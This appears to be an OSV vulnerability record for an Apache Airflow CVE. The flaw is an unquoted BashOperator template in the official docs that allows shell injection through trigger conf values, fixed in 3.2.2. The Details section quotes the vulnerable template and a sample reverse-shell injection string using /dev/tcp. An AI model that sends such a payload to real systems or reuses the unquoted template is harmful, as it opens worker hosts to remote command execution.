CVE-2026-42252

Source
https://cve.org/CVERecord?id=CVE-2026-42252
Import Source
https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2026-42252.json
JSON Data
https://api.osv.dev/v1/vulns/CVE-2026-42252
Aliases
Downstream
Published
2026-06-01T07:51:19.018Z
Modified
2026-07-09T21:11:15.115730352Z
Severity
  • 9.1 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N CVSS Calculator
Summary
Apache Airflow: BashOperator Jinja2 injection via dag_run.conf — low-privilege user pattern
Details

Apache Airflow's official documentation at core-concepts/dag-run.html ("Passing Parameters when triggering Dags") showed a verbatim BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}") example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had Dag.can_trigger permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the conf field of the trigger API: an authenticated trigger user could supply "; bash -i >& /dev/tcp/.../9999 0>&1; #" as a conf value and reach an os.exec on the worker. This CVE covers the documentation correction in apache/airflow PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to apache-airflow 3.2.2 or later to pick up the corrected documentation shipped with the release.

Database specific
{
    "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/42xxx/CVE-2026-42252.json",
    "cna_assigner": "apache",
    "cwe_ids": [
        "CWE-1336"
    ]
}
References

Affected packages

Git / github.com/apache/airflow

Affected ranges

Type
GIT
Repo
https://github.com/apache/airflow
Events
Database specific
{
    "source": [
        "AFFECTED_FIELD",
        "CPE_RANGE"
    ],
    "cpe": "cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*",
    "extracted_events": [
        {
            "introduced": "3.0.0"
        },
        {
            "fixed": "3.2.2"
        }
    ]
}

Database specific

source
"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2026-42252.json"